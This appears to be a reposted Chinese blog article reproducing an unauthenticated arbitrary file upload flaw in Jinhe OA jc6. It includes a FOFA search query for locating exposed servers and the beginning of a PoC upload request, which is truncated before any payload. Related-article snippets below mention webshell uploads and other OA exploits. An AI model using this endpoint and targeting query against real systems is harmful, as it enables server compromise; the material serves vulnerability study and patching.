金和OA jc6 Upload 任意文件上传漏洞复现

10月前作者：OidBoy_G 分类：Toy博客阅读(55) 违法举报

这篇具有很好参考价值的文章主要介绍了金和OA jc6 Upload 任意文件上传漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

0x01 产品简介

金和OA协同办公管理系统软件（简称金和OA），本着简单、适用、高效的原则，贴合企事业单位的实际需求，实行通用化、标准化、智能化、人性化的产品设计，充分体现企事业单位规范管理、提高办公效率的核心思想，为用户提供一整套标准的办公自动化解决方案，以帮助企事业单位迅速建立便捷规范的办公环境。

0x02 漏洞概述

金和OA jc6系统/jc6/servlet/Upload接口处存在任意文件上传漏洞，未经身份认证的攻击者可利用此漏洞上传恶意后门文件，最终可导致服务器失陷。

0x03 复现环境

FOFA：body="/jc6/platform/sys/login"

金和OA jc6 Upload 任意文件上传漏洞复现,漏洞复现,安全,web安全

0x04 漏洞复现

PoC文章来源地址https://www.toymoban.com/news/detail-794027.html

POST /jc6/servlet/Upload?officeSaveFlag=0&dbimg=false&path=&setpath=/upload/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK

------WebKitFormBoundary5iALAXlSiqxJXrhK
Content-Disposition: form-data; name="im

到了这里，关于金和OA jc6 Upload 任意文件上传漏洞复现的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

金和OA C6 CarCardInfo.aspx SQL注入漏洞

产品简介金和OA协同办公管理系统软件（简称金和OA），本着简单、适用、高效的原则，贴合企事业单位的实际需求，实行通用化、标准化、智能化、人性化的产品设计，充分体现企事业单位规范管理、提高办公效率的核心思想，为用户提供一整套标准的办公自动化解决方案

2024年01月16日
浏览(53)
【漏洞复现-通达OA】通达OA get_file.php 任意文件下载漏洞

通达OA get_file.php文件存在任意文件下载漏洞，攻击者通过漏洞可以读取服务器敏感文件。 ● 通达OA2011 ● hunter app.name=\\\"通达 OA\\\" ● 特征

2024年02月21日
浏览(63)
某OA 11.10 未授权任意文件上传

之前也对通达 oa 做过比较具体的分析和漏洞挖掘，前几天看到通达 oa 11.10 存在未授权任意文件上传漏洞，于是也打算对此进行复现和分析。 https://www.tongda2000.com/download/p2019.php 下载地址：https://cdndown.tongda2000.com/oa/2019/TDOA11.10.exe 查看版本信息无法直接写入带有变量的

2024年02月07日
浏览(22)
致远OA SQL&任意文件下载漏洞(含批量检测POC)

致远OA A6 test.jsp 存在sql注入漏洞，并可以通过注入写入webshell文件控制服务器漏洞影响致远OA A6 网络测绘 app=“致远OA6” 批量检测POC 当然扫描结果可能不是特别准确，可能因素是网络测绘工具根据语法收集的ip有出入，或者有waf检测到恶意流量跳转到防护页面等，状态码也是

2024年02月07日
浏览(65)
华天动力-OA8000 MyHttpServlet 文件上传漏洞复现

华天动力OA是一款将先进的管理思想、管理模式和软件技术、网络技术相结合，为用户提供了低成本、高效能的协同办公和管理平台。华天动力OA MyHttpServlet 存在任意文件上传漏洞，未经身份认证的攻击者可上传恶意的raq文件并执行raq文件中的任意sql语句，获取用户

2024年01月20日
浏览(43)
致远OA文件上传漏洞(含批量检测POC)

文章内容仅供学习参考请勿用于非法用途漏洞描述漏洞影响致远OA A6、A8、A8N (V8.0SP2，V8.1，V8.1SP1) 致远OA G6、G6N (V8.1、V8.1SP1) 网络测绘 app=“致远互联-OA” title=“V8.0SP2” 批量检测POC 漏洞描述致远OA是一套办公协同管理软件。近日，奇安信CERT监测到致远OA的相关漏洞信息。由

2024年02月08日
浏览(48)
文件上传漏洞（upload部分通关教程）

只适合只有前端验证的网站一句话木马：保存到文件中：使用第一关直接上传，报错：按照网站要求，修改文件后缀名为jpg：重新上传111.jpg文件，打开burp抓包，修改包中的后缀名点击Forword上传，上传成功：使用蚁剑连接后台步骤：复制url：连接成功：原理就是验证后

2024年02月22日
浏览(43)
文件上传漏洞-upload靶场5-12关

在前两篇文章中，已经说了分析上传漏的思路，在本篇文章中，将带领大家熟悉winodws系统存在的一些上传漏洞。思路分析源码与pass-4的源码相比，此处在效验规则中，把转换小写的$file_ext = strtolower($file_ext);规则去掉了，也就是说我们上传的文件后缀，大小写将不会验证

2024年02月10日
浏览(45)
【网络安全 --- 任意文件上传漏洞靶场闯关 6-15关】任意文件上传漏洞靶场闯关，让你更深入了解文件上传漏洞以及绕过方式方法，思路技巧

首先分享一个自己做的很不错的网路安全笔记，内容详细介绍了许多知识超详细的网络安全笔记分享一个非常详细的网络安全笔记，是我学习网安过程中用心写的，可以点开以下链接获取：超详细的网络安全笔记编辑https://m.tb.cn/h.5JdFcih?tk=OuVrWRl9vMx%20CZ3457 https://m.tb.cn/

2024年02月07日
浏览(48)
任意文件上传漏洞

上传漏洞允许攻击者通过上传木马文件，直接获取web服务器的权限。图片上传模块存在任意文件上传漏洞，通过修改图片上传传输页面的数据包可以上传木马文件，并最终获取到服务器的权限，如下图所示。木马程序如下： ------WebKitFormBoundaryS5DF515w3dmuH4em Content-Dispositio

2024年02月08日
浏览(43)